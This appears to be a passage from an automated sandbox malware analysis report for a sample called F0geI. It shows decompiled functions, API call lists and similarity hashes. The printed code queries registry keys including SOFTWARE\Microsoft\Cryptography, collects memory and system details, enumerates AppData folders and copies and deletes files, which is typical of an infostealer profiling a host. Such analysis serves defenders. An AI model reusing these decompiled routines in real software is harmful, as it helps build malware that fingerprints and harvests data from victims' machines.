                                                                                                                                                                        				long _t11;
                                                                                                                                                                        				void* _t14;
                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                        				void* _t24;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t32;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t35;
                                                                                                                                                                        				intOrPtr* _t37;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = 0x104;
                                                                                                                                                                        				_t33 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208, _t32, _t35, _t24, __ecx, __ecx);
                                                                                                                                                                        				_t25 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
                                                                                                                                                                        				_t11 = RegOpenKeyExW(0x80000002,  *0x40e298, 0, 0x20119,  &_v8); // executed
                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                        					RegQueryValueExW(_v8,  *0x40e448, 0, 0, _t33,  &_v12); // executed
                                                                                                                                                                        				}
                                                                                                                                                                        				RegCloseKey(_v8);
                                                                                                                                                                        				_t14 =  *((intOrPtr*)( *0x40e08c))(_t33);
                                                                                                                                                                        				_push(_t33);
                                                                                                                                                                        				if(_t14 > 0) {
                                                                                                                                                                        					wsprintfW(_t25,  *0x40e32c);
                                                                                                                                                                        					_t37 = _a4;
                                                                                                                                                                        					 *_t37 = E0040A503( *_t37, _t25);
                                                                                                                                                                        					LocalFree(_t33);
                                                                                                                                                                        					LocalFree(_t25);
                                                                                                                                                                        					_t20 = 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t20 = LocalFree() | 0xffffffff;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t20;
                                                                                                                                                                        			}














                                                                                                                                                                        0x004090f0
                                                                                                                                                                        0x004090ff
                                                                                                                                                                        0x00409110
                                                                                                                                                                        0x00409129
                                                                                                                                                                        0x0040912d
                                                                                                                                                                        0x0040913f
                                                                                                                                                                        0x0040913f
                                                                                                                                                                        0x00409148
                                                                                                                                                                        0x00409154
                                                                                                                                                                        0x00409156
                                                                                                                                                                        0x00409159
                                                                                                                                                                        0x0040916d
                                                                                                                                                                        0x00409173
                                                                                                                                                                        0x00409183
                                                                                                                                                                        0x00409185
                                                                                                                                                                        0x0040918c
                                                                                                                                                                        0x00409194
                                                                                                                                                                        0x0040915b
                                                                                                                                                                        0x00409161
                                                                                                                                                                        0x00409161
                                                                                                                                                                        0x00409199

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00409A62,00000000), ref: 00409129
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,00000104,?,?,?,00409A62,00000000), ref: 0040913F
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,00409A62,00000000), ref: 00409148
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00409A62,00000000), ref: 0040915B
                                                                                                                                                                        • wsprintfW.USER32 ref: 0040916D
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000), ref: 00409185
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040918C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$lstrlen$AllocCloseGlobalOpenQueryValuewsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 660617932-0
                                                                                                                                                                        • Opcode ID: e7309cc0036a2c61331d2b52a6aee609973f60ba401e8f0191633dded93efb61
                                                                                                                                                                        • Instruction ID: e9f177af51a582558b006cd38ce564a6bd3d86c6e4fd3138e243791f8522013c
                                                                                                                                                                        • Opcode Fuzzy Hash: e7309cc0036a2c61331d2b52a6aee609973f60ba401e8f0191633dded93efb61
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E119372600110BBE7049BA7ED49E5BBFBCEB49350B104839F609F61A1D6B45D20CB79
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E00403F9D(void* __ecx, intOrPtr __edx, char _a4, char _a8) {
                                                                                                                                                                        				void* _t7;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				void* _t28;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        
                                                                                                                                                                        				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228, _t26, _t30, _t16, __ecx);
                                                                                                                                                                        				_t7 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228);
                                                                                                                                                                        				_t28 = _t7;
                                                                                                                                                                        				 *0x40e0c4(0, _t17, 0x1c, 0);
                                                                                                                                                                        				 *0x40e0c4(0, _t28, 0x1a, 0);
                                                                                                                                                                        				_t1 =  &_a8; // 0x407b38
                                                                                                                                                                        				E00401B05(_t17,  *_t1, __edx, _a4, 0);
                                                                                                                                                                        				_t3 =  &_a8; // 0x407b38
                                                                                                                                                                        				E0040196E(_t28,  *_t3, __edx, _a4, 0); // executed
                                                                                                                                                                        				if(_t17 != 0) {
                                                                                                                                                                        					LocalFree(_t17);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                        				}
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}









                                                                                                                                                                        0x00403fbe
                                                                                                                                                                        0x00403fc3
                                                                                                                                                                        0x00403fcc
                                                                                                                                                                        0x00403fce
                                                                                                                                                                        0x00403fdb
                                                                                                                                                                        0x00403fe1
                                                                                                                                                                        0x00403fec
                                                                                                                                                                        0x00403ff1
                                                                                                                                                                        0x00403fff
                                                                                                                                                                        0x00404009
                                                                                                                                                                        0x0040400c
                                                                                                                                                                        0x0040400c
                                                                                                                                                                        0x00404014
                                                                                                                                                                        0x00404017
                                                                                                                                                                        0x00404017
                                                                                                                                                                        0x00404026

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00407B38,00000000,00000000), ref: 00403FCE
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,?,00407B38,00000000,00000000), ref: 00403FDB
                                                                                                                                                                          • Part of subcall function 00401B05: FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401B5B
                                                                                                                                                                          • Part of subcall function 0040196E: FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004019C6
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 0040400C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 00404017
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirstFolderFreeLocalPathSpecial
                                                                                                                                                                        • String ID: 8{@
                                                                                                                                                                        • API String ID: 1746351402-1865321623
                                                                                                                                                                        • Opcode ID: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
                                                                                                                                                                        • Instruction ID: 72fdba0f78f482ba83b50744195af73f567e22cf42767fcd2574695d6fb78c79
                                                                                                                                                                        • Opcode Fuzzy Hash: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
                                                                                                                                                                        • Instruction Fuzzy Hash: 600128713402047BF7205F929D4AF6B3768DBC5B11F044138FB18BB2D1DAB49C1086AD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039CB
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 00403867
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 004039AA
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 004039BA
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039C1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFreeLocal$Delete$Copy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2498017937-0
                                                                                                                                                                        • Opcode ID: 2887cd1b965e8c1fd80b588964d614a9ad5f8ca9391292049183dc8960f1e9c0
                                                                                                                                                                        • Instruction ID: 855b80ec5d303092bec4e067a8265e7fa441cfeb4fa3f9afbe0cd358cb9c57d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 2887cd1b965e8c1fd80b588964d614a9ad5f8ca9391292049183dc8960f1e9c0
                                                                                                                                                                        • Instruction Fuzzy Hash: EF718D71500210EFDB059FA6EE84A5E3BB9FB48310B104979F925F72E0DB74DA208B5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                        			E0040A5FA() {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				int _v12;
                                                                                                                                                                        				int _v16;
                                                                                                                                                                        				long _t11;
                                                                                                                                                                        				long _t14;
                                                                                                                                                                        				char* _t19;
                                                                                                                                                                        
                                                                                                                                                                        				_t19 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_v12 = 0x104;
                                                                                                                                                                        				_v16 = 1;
                                                                                                                                                                        				_t11 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119,  &_v8); // executed
                                                                                                                                                                        				_t14 = RegQueryValueExW(_v8,  *0x40e278, 0,  &_v16, _t19,  &_v12); // executed
                                                                                                                                                                        				if(_t11 != 0 || _t14 != 0) {
                                                                                                                                                                        					RegCloseKey(_v8);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t19;
                                                                                                                                                                        			}









                                                                                                                                                                        0x0040a616
                                                                                                                                                                        0x0040a61b
                                                                                                                                                                        0x0040a634
                                                                                                                                                                        0x0040a63b
                                                                                                                                                                        0x0040a659
                                                                                                                                                                        0x0040a65d
                                                                                                                                                                        0x0040a666
                                                                                                                                                                        0x0040a666
                                                                                                                                                                        0x0040a671

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 0040A63B
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,00000000,00000001,00000000,00000104), ref: 0040A659
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040A666
                                                                                                                                                                        Strings
                                                                                                                                                                        • SOFTWARE\Microsoft\Cryptography, xrefs: 0040A62A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                        • API String ID: 3677997916-1514646153
                                                                                                                                                                        • Opcode ID: 1233372230aca0e7df5d087625ad0dd89436495b9e8128ba46b7d0fdcd860ef1
                                                                                                                                                                        • Instruction ID: b7295adda02a32b73446885dd9b7f16e439bc7fa4040cb3c3f6055cefdfb8544
                                                                                                                                                                        • Opcode Fuzzy Hash: 1233372230aca0e7df5d087625ad0dd89436495b9e8128ba46b7d0fdcd860ef1
                                                                                                                                                                        • Instruction Fuzzy Hash: F2F0F4B6A00214BBEB148BA5ED46FDE7BB8EB84700F040075FB00F22D0C6B09E14CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __nh_malloc_dbg.LIBCMTD ref: 0041FB3B
                                                                                                                                                                          • Part of subcall function 00415840: __calloc_dbg_impl.LIBCMTD ref: 00415867
                                                                                                                                                                          • Part of subcall function 00415840: __errno.LIBCMTD ref: 0041587E
                                                                                                                                                                          • Part of subcall function 00415840: __errno.LIBCMTD ref: 00415887
                                                                                                                                                                        • __nh_malloc_dbg.LIBCMTD ref: 0041FC67
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __errno__nh_malloc_dbg$__calloc_dbg_impl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2503616996-0
                                                                                                                                                                        • Opcode ID: 778e38bc6efd97f1c7f924d20f97de91371a753f1577105e6e19857a5e9c0ec2
                                                                                                                                                                        • Instruction ID: 917154f0986699b353dad1ef751c0d4a147727080a5085d724b1d19719880e11
                                                                                                                                                                        • Opcode Fuzzy Hash: 778e38bc6efd97f1c7f924d20f97de91371a753f1577105e6e19857a5e9c0ec2
                                                                                                                                                                        • Instruction Fuzzy Hash: A4E11C74E04248CFDB24CFA4D894BADFBB1BB49314F24826ED8666B392D7349846CF45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                        			E0040A503(WCHAR* __ecx, WCHAR* __edx) {
                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				int _t7;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				WCHAR* _t16;
                                                                                                                                                                        				void* _t32;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t16 = __edx;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				_t7 = lstrlenW(__edx);
                                                                                                                                                                        				_t3 = lstrlenW(_v8) + 0x80; // 0x80
                                                                                                                                                                        				_t10 = LocalAlloc(0x40, _t3 + _t7 + _t3 + _t7); // executed
                                                                                                                                                                        				_t32 = _t10;
                                                                                                                                                                        				E0040185F(_t32, _t28, _v8);
                                                                                                                                                                        				E0040188C(_t16, _t32, _t28, _t32, _t16);
                                                                                                                                                                        				GlobalFree(_v8); // executed
                                                                                                                                                                        				return _t32;
                                                                                                                                                                        			}










                                                                                                                                                                        0x0040a506
                                                                                                                                                                        0x0040a510
                                                                                                                                                                        0x0040a513
                                                                                                                                                                        0x0040a516
                                                                                                                                                                        0x0040a525
                                                                                                                                                                        0x0040a533
                                                                                                                                                                        0x0040a538
                                                                                                                                                                        0x0040a53e
                                                                                                                                                                        0x0040a548
                                                                                                                                                                        0x0040a550
                                                                                                                                                                        0x0040a55c

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$AllocFreeGlobalLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3873415381-0
                                                                                                                                                                        • Opcode ID: 7439b9250609968e6e63ff34dd066d63b489fcc9440e39b785881af818bd08f0
                                                                                                                                                                        • Instruction ID: a16c6b1f1c1aff7e88faa53ff7a807ce8724a9faba81c89562836050573d755b
                                                                                                                                                                        • Opcode Fuzzy Hash: 7439b9250609968e6e63ff34dd066d63b489fcc9440e39b785881af818bd08f0
                                                                                                                                                                        • Instruction Fuzzy Hash: DCF02472700014FFCB04A79A9D45DAEF7AEEFC4340B144076E900F3321DAB09E018AA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2102423945-0
                                                                                                                                                                        • Opcode ID: 69410c4095798773577b1bc710edf945ef39628d419657129ea33efc134ce160
                                                                                                                                                                        • Instruction ID: 23e798914de5c24cc93c4aaee41f7ebc1c487050272a37944d5bfb3b0d472494
                                                                                                                                                                        • Opcode Fuzzy Hash: 69410c4095798773577b1bc710edf945ef39628d419657129ea33efc134ce160
                                                                                                                                                                        • Instruction Fuzzy Hash: 7551FCB4A01204DFCB18CF45D995BDA77F1BB88315F24816AE9156B391D335EE80CF98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E0040A3E4(intOrPtr __ecx, intOrPtr* __edx, signed int _a4, signed int _a8) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				intOrPtr* _v12;
                                                                                                                                                                        				void* _t18;
                                                                                                                                                                        				void _t25;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t34;
                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                        				void* _t37;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        
                                                                                                                                                                        				_t27 = __edx;
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				_t18 = LocalAlloc(0x40, 0x80 +  *((intOrPtr*)( *0x40e08c))(__ecx, _t34, _t37, _t26, __ecx, __ecx) * 2); // executed
                                                                                                                                                                        				_t31 = _a4;
                                                                                                                                                                        				_t39 = _t18;
                                                                                                                                                                        				_t35 = _a8;
                                                                                                                                                                        				if(_t31 < _t35) {
                                                                                                                                                                        					_t29 = _v8;
                                                                                                                                                                        					_t33 = _t39;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t25 =  *((intOrPtr*)(_t29 + _t31 * 2));
                                                                                                                                                                        						_t31 = _t31 + 1;
                                                                                                                                                                        						 *_t33 = _t25;
                                                                                                                                                                        						_t33 = _t33 + 2;
                                                                                                                                                                        					} while (_t31 < _t35);
                                                                                                                                                                        					_t27 = _v12;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *((short*)(_t39 + 2 + _t35 * 2)) = 0;
                                                                                                                                                                        				 *_t27 =  *((intOrPtr*)( *0x40e13c))( *_t27, _t39);
                                                                                                                                                                        				if(_t39 != 0) {
                                                                                                                                                                        					LocalFree(_t39);
                                                                                                                                                                        				}
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}
















                                                                                                                                                                        0x0040a3f6
                                                                                                                                                                        0x0040a3fa
                                                                                                                                                                        0x0040a3fd
                                                                                                                                                                        0x0040a40c
                                                                                                                                                                        0x0040a40e
                                                                                                                                                                        0x0040a411
                                                                                                                                                                        0x0040a413
                                                                                                                                                                        0x0040a418
                                                                                                                                                                        0x0040a41a
                                                                                                                                                                        0x0040a41d
                                                                                                                                                                        0x0040a41f
                                                                                                                                                                        0x0040a41f
                                                                                                                                                                        0x0040a423
                                                                                                                                                                        0x0040a424
                                                                                                                                                                        0x0040a427
                                                                                                                                                                        0x0040a42a
                                                                                                                                                                        0x0040a42e
                                                                                                                                                                        0x0040a42e
                                                                                                                                                                        0x0040a436
                                                                                                                                                                        0x0040a442
                                                                                                                                                                        0x0040a446
                                                                                                                                                                        0x0040a449
                                                                                                                                                                        0x0040a449
                                                                                                                                                                        0x0040a456

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree
                                                                                                                                                                        • String ID: y@
                                                                                                                                                                        • API String ID: 2012307162-1812993971
                                                                                                                                                                        • Opcode ID: ccb5b4be9ee1bd7769a826cb499616f7c5e28c2612ab748d711503cbdb706c51
                                                                                                                                                                        • Instruction ID: f3cb8fed4fc86e8926e4ae745f77bd99f1ad2e4c346b1d96af304dd36abb34b3
                                                                                                                                                                        • Opcode Fuzzy Hash: ccb5b4be9ee1bd7769a826cb499616f7c5e28c2612ab748d711503cbdb706c51
                                                                                                                                                                        • Instruction Fuzzy Hash: 8501D475610224AFDB15CF99DC80DAE77F9EF8C720B10856AE905E7310E770AD11CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E0040942A(intOrPtr* _a4) {
                                                                                                                                                                        				struct _MEMORYSTATUSEX _v68;
                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        				int _t29;
                                                                                                                                                                        				intOrPtr* _t30;
                                                                                                                                                                        
                                                                                                                                                                        				_t10 =  *0x40e02c;
                                                                                                                                                                        				_t29 = 0x40;
                                                                                                                                                                        				_v68.dwLength = _t29;
                                                                                                                                                                        				GlobalMemoryStatusEx( &_v68); // executed
                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                        					_t27 =  *((intOrPtr*)( *0x40e044))(_t29, 0x400, _t26);
                                                                                                                                                                        					wsprintfW(_t27,  *0x40e290, (_v68.ullAvailPhys << 0x00000020 | _v68.ullTotalPhys) >> 0x14, _v68.ullAvailPhys >> 0x14);
                                                                                                                                                                        					_t30 = _a4;
                                                                                                                                                                        					 *_t30 = E0040A503( *_t30, _t27);
                                                                                                                                                                        					LocalFree(_t27);
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t10 | 0xffffffff;
                                                                                                                                                                        			}









                                                                                                                                                                        0x00409430
                                                                                                                                                                        0x0040943b
                                                                                                                                                                        0x0040943d
                                                                                                                                                                        0x00409440
                                                                                                                                                                        0x00409444
                                                                                                                                                                        0x0040945c
                                                                                                                                                                        0x00409471
                                                                                                                                                                        0x00409477
                                                                                                                                                                        0x00409487
                                                                                                                                                                        0x00409489
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409492
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,74655850,?,?,?,?,?,?,?,?,?,00409A7D,00000000,00000000,00000000,00000000), ref: 00409440
                                                                                                                                                                        • wsprintfW.USER32 ref: 00409471
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A7D,00000000), ref: 00409489
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeGlobalLocalMemoryStatuswsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2569036613-0
                                                                                                                                                                        • Opcode ID: 64e85a53e754cb8c1d035c480df7db8858dd6127a9db0cbe0f38b20b7d924fe7
                                                                                                                                                                        • Instruction ID: 691c7a2968302921ddf9a2c3bc51e1d1d0e2bb0df5734c172083d1d357432de7
                                                                                                                                                                        • Opcode Fuzzy Hash: 64e85a53e754cb8c1d035c480df7db8858dd6127a9db0cbe0f38b20b7d924fe7
                                                                                                                                                                        • Instruction Fuzzy Hash: 6501D671A00114ABD700DF6AEC04E6FBBB9EB84324B00453DF616F7291D6749912C7A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E0040A4C2(char* __ecx) {
                                                                                                                                                                        				short* _t7;
                                                                                                                                                                        				int _t11;
                                                                                                                                                                        				char* _t14;
                                                                                                                                                                        				short* _t16;
                                                                                                                                                                        
                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                        				_t11 =  *((intOrPtr*)( *0x40e198))(__ecx);
                                                                                                                                                                        				_t7 = LocalAlloc(0x40, 0x10 + _t11 * 2); // executed
                                                                                                                                                                        				_t16 = _t7;
                                                                                                                                                                        				MultiByteToWideChar(0xfde9, 0, _t14, 0xffffffff, _t16, _t11);
                                                                                                                                                                        				_t16[_t11] = 0;
                                                                                                                                                                        				return _t16;
                                                                                                                                                                        			}







                                                                                                                                                                        0x0040a4ca
                                                                                                                                                                        0x0040a4d5
                                                                                                                                                                        0x0040a4e1
                                                                                                                                                                        0x0040a4e4
                                                                                                                                                                        0x0040a4f1
                                                                                                                                                                        0x0040a4f9
                                                                                                                                                                        0x0040a502

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,76426c3f362f5a47a469f0e9d8bc3eef,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
